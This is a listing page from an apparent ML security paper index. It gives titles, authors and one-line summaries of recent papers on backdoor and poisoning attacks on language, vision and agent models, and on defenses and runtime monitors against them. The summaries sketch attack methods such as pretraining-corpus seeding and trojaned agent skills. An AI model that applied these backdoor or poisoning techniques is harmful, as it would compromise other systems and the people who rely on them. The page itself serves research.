ML Security Papers

Latest papers

369 papers

attack arXiv Apr 30, 2026 · 21d ago

Secret Stealing Attacks on Local LLM Fine-Tuning through Supply-Chain Model Code Backdoors

Zi Li, Tian Zhou, Wenze Li et al. · Nanjing University

Malicious model code backdoors that hijack fine-tuning to force memorization and extraction of high-entropy secrets like API keys

AI Supply Chain Attacks Model Inversion Attack Model Poisoning Sensitive Information Disclosure nlp

PDF

defense arXiv Apr 29, 2026 · 22d ago

SafeTune: Mitigating Data Poisoning in LLM Fine-Tuning for RTL Code Generation

Mahshid Rezakhani, Nowfel Mashnoor, Kimia Azar et al. · University of Central Florida

Dual-layer filtering framework detecting poisoned training data in LLM RTL generation via GNN structural analysis and semantic prompt verification

Data Poisoning Attack Model Poisoning Training Data Poisoning nlpgenerative

PDF

defense arXiv Apr 27, 2026 · 24d ago

Unveiling the Backdoor Mechanism Hidden Behind Catastrophic Overfitting in Fast Adversarial Training

Mengnan Zhao, Lihe Zhang, Tianhang Zheng et al. · AnHui University · Dalian University of Technology +1 more

Interprets catastrophic overfitting in fast adversarial training as trigger-based backdoor behavior and proposes backdoor-inspired mitigation strategies

Input Manipulation Attack Model Poisoning vision

PDF

defense arXiv Apr 27, 2026 · 24d ago

Defusing the Trigger: Plug-and-Play Defense for Backdoored LLMs via Tail-Risk Intrinsic Geometric Smoothing

Kaisheng Fan, Weizhe Zhang, Yishu Gao et al. · Harbin Institute of Technology · Peng Cheng Laboratory +1 more

Plug-and-play inference-time backdoor defense detecting trigger-induced attention collapse in LLMs without parameter updates or latency overhead

Model Poisoning Training Data Poisoning nlp

PDF

defense arXiv Apr 27, 2026 · 24d ago

Layerwise Convergence Fingerprints for Runtime Misbehavior Detection in Large Language Models

Nay Myat Min, Long H. Pham, Jun Sun · Singapore Management University

Tuning-free runtime monitor detecting backdoors, jailbreaks, and prompt injection by analyzing hidden-state convergence patterns across LLM layers

Model Poisoning Prompt Injection nlp

PDF

attack arXiv Apr 27, 2026 · 24d ago

DETOUR: A Practical Backdoor Attack against Object Detection

Dazhuang Liu, Yanqi Qiao, Rui Wang et al. · Delft University of Technology · University of Turku

Backdoor attack on detection transformers using semantic triggers optimized for real-world deployment across varying viewpoints and spatial configurations

Model Poisoning vision

PDF

attack arXiv Apr 25, 2026 · 26d ago

Toward Polymorphic Backdoor against Semantic Communication via Intensity-Based Poisoning

Xiao Yang, Yuni Lai, Gaolei Li et al. · Shanghai Jiao Tong University · Hong Kong Polytechnic University +1 more

Polymorphic backdoor attack on semantic communication systems using intensity-graded triggers for multiple target outputs plus provable defense

Model Poisoning Data Poisoning Attack visionmultimodal

PDF

attack ICLR Apr 25, 2026 · 26d ago

Ulterior Motives: Detecting Misaligned Reasoning in Continuous Thought Models

Sharan Ramjee · Stanford University

Dual-trigger backdoor attack on continuous thought models that arms misaligned reasoning in latent space, with linear probe detection

Model Poisoning Input Manipulation Attack Prompt Injection nlp

PDF

defense arXiv Apr 23, 2026 · 28d ago

CSC: Turning the Adversary's Poison against Itself

Yuchen Shi, Xin Guo, Huajie Chen et al. · City University of Macau · University of Technology Sydney

Detects poisoned training samples via early-epoch clustering and neutralizes backdoors by relabeling them to a virtual class

Model Poisoning vision

PDF

attack arXiv Apr 23, 2026 · 28d ago

PermaFrost-Attack: Stealth Pretraining Seeding(SPS) for planting Logic Landmines During LLM Training

Harsh Kumar, Rahul Maity, Tanmay Joshi et al. · Manipal University Jaipur · National Institute of Technology Karnataka +3 more

Web-scale poisoning attack planting dormant backdoor triggers in LLM pretraining corpora via stealth websites indexed by Common Crawl

Data Poisoning Attack Model Poisoning AI Supply Chain Attacks Training Data Poisoning nlp

PDF Code

attack arXiv Apr 23, 2026 · 28d ago

Stealthy Backdoor Attacks against LLMs Based on Natural Style Triggers

Jiali Wei, Ming Fan, Guoheng Sun et al. · Xi’an Jiaotong University

Style-based backdoor attack on LLMs using imperceptible triggers with auxiliary loss for stable payload injection across fine-tuning

Model Poisoning Training Data Poisoning nlp

PDF

attack arXiv Apr 21, 2026 · 4w ago

PASTA: A Patch-Agnostic Twofold-Stealthy Backdoor Attack on Vision Transformers

Dazhuang Liu, Yanqi Qiao, Rui Wang et al. · Delft University of Technology · University of Turku

Patch-agnostic backdoor attack on Vision Transformers achieving 99% success across arbitrary trigger locations while evading detection

Model Poisoning vision

PDF

benchmark arXiv Apr 21, 2026 · 4w ago

ProjLens: Unveiling the Role of Projectors in Multimodal Model Safety

Kun Wang, Cheng Qian, Miao Yu et al. · Nanyang Technological University · University of Science and Technology of China +3 more

Interpretability framework revealing that MLLM backdoors encode in low-rank projector subspaces with norm-scaled activation mechanisms

Model Poisoning multimodalnlpvision

PDF Code

defense arXiv Apr 21, 2026 · 4w ago

Mechanistic Anomaly Detection via Functional Attribution

Hugo Lyons Keenan, Christopher Leckie, Sarah Erfani · The University of Melbourne

Detects backdoors and adversarial examples by measuring functional coupling between test samples and trusted reference data via influence functions

Model Poisoning Input Manipulation Attack visionnlpmultimodal

PDF

defense arXiv Apr 14, 2026 · 5w ago

Scaling Exposes the Trigger: Input-Level Backdoor Detection in Text-to-Image Diffusion Models via Cross-Attention Scaling

Zida Li, Jun Li, Yuzhe Sha et al. · Nanjing University of Information Science and Technology

Detects backdoor triggers in text-to-image diffusion models by analyzing cross-attention scaling response patterns during inference

Model Poisoning visiongenerative

PDF

attack arXiv Apr 14, 2026 · 5w ago

Compiling Activation Steering into Weights via Null-Space Constraints for Stealthy Backdoors

Rui Yin, Tianxu Han, Naen Xu et al. · Zhejiang University · Palo Alto Networks +3 more

Stealthy LLM backdoor injection via weight editing that compiles activation steering into null-space constraints for reliable jailbreaks

Model Poisoning AI Supply Chain Attacks Prompt Injection nlp

PDF

defense arXiv Apr 12, 2026 · 5w ago

DuCodeMark: Dual-Purpose Code Dataset Watermarking via Style-Aware Watermark-Poison Design

Yuchen Chen, Yuan Xiao, Chunrong Fang et al. · Nanjing University

Embeds ownership watermarks in code training datasets using AST-based style triggers plus poisoned samples that degrade model performance if watermark is removed

Output Integrity Attack Model Poisoning nlp

PDF

defense arXiv Apr 12, 2026 · 5w ago

Latent Instruction Representation Alignment: defending against jailbreaks, backdoors and undesired knowledge in LLMs

Eric Easley, Sebastian Farquhar · University of California · University of Oxford

Defense training LLMs to reinterpret malicious instructions as benign at the representation level, blocking jailbreaks and backdoors

Model Poisoning Prompt Injection Sensitive Information Disclosure nlp

PDF

defense arXiv Apr 12, 2026 · 5w ago

Critical-CoT: A Robust Defense Framework against Reasoning-Level Backdoor Attacks in Large Language Models

Vu Tuan Truong, Long Bao Le · University of Quebec

Two-stage fine-tuning defense teaching LLMs critical thinking to detect and refuse malicious reasoning steps in backdoor attacks

Model Poisoning nlp

PDF Code

attack arXiv Apr 10, 2026 · 5w ago

BadSkill: Backdoor Attacks on Agent Skills via Model-in-Skill Poisoning

Guiyao Tie, Jiawen Shi, Pan Zhou et al. · Huazhong University of Science and Technology · Lehigh University

Backdoor attack embedding trojaned classifiers in agent skills that activate malicious payloads via semantic trigger combinations in routine parameters

Model Poisoning AI Supply Chain Attacks Excessive Agency nlp

PDF

Loading more papers…

Latest papers

Secret Stealing Attacks on Local LLM Fine-Tuning through Supply-Chain Model Code Backdoors

SafeTune: Mitigating Data Poisoning in LLM Fine-Tuning for RTL Code Generation

Unveiling the Backdoor Mechanism Hidden Behind Catastrophic Overfitting in Fast Adversarial Training

Defusing the Trigger: Plug-and-Play Defense for Backdoored LLMs via Tail-Risk Intrinsic Geometric Smoothing

Layerwise Convergence Fingerprints for Runtime Misbehavior Detection in Large Language Models

DETOUR: A Practical Backdoor Attack against Object Detection

Toward Polymorphic Backdoor against Semantic Communication via Intensity-Based Poisoning

Ulterior Motives: Detecting Misaligned Reasoning in Continuous Thought Models

CSC: Turning the Adversary's Poison against Itself

PermaFrost-Attack: Stealth Pretraining Seeding(SPS) for planting Logic Landmines During LLM Training

Stealthy Backdoor Attacks against LLMs Based on Natural Style Triggers

PASTA: A Patch-Agnostic Twofold-Stealthy Backdoor Attack on Vision Transformers

ProjLens: Unveiling the Role of Projectors in Multimodal Model Safety

Mechanistic Anomaly Detection via Functional Attribution

Scaling Exposes the Trigger: Input-Level Backdoor Detection in Text-to-Image Diffusion Models via Cross-Attention Scaling

Compiling Activation Steering into Weights via Null-Space Constraints for Stealthy Backdoors

DuCodeMark: Dual-Purpose Code Dataset Watermarking via Style-Aware Watermark-Poison Design

Latent Instruction Representation Alignment: defending against jailbreaks, backdoors and undesired knowledge in LLMs

Critical-CoT: A Robust Defense Framework against Reasoning-Level Backdoor Attacks in Large Language Models

BadSkill: Backdoor Attacks on Agent Skills via Model-in-Skill Poisoning

Filters

Time Period

Paper Type

OWASP ML Top 10

OWASP LLM Top 10

Institution

Venue